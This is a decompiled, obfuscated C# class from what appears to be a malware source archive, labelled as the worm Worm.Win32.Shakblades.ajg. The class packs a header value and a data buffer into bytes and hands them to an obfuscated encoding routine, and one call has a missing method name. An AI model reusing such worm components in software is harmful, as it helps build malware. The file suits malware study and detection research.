MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ᛷḼဩ৏.cs

34 lines
1.1 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᛷḼဩ৏
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Collections.Generic;
namespace Ҧ߲ʽ
{
internal class \u09CF
{
public \u07F6\u181Fᒸৃ.ƪ ڗ\u0D81ő\u0D70;
public byte[] \u108Aປ;
public \u09CF(\u07F6\u181Fᒸৃ.ƪ header, byte[] data)
{
this.ڗ\u0D81ő\u0D70 = header;
this.\u108Aປ = data;
}
public byte[] ڨ()
{
List<byte> byteList = new List<byte>();
byteList.AddRange((IEnumerable<byte>) BitConverter.GetBytes((int) this.ڗ\u0D81ő\u0D70));
byteList.AddRange((IEnumerable<byte>) this.\u108Aປ);
byte[] array = byteList.ToArray();
byteList.Clear();
return \u1928ᔾዔ.(array, true);
}
}
}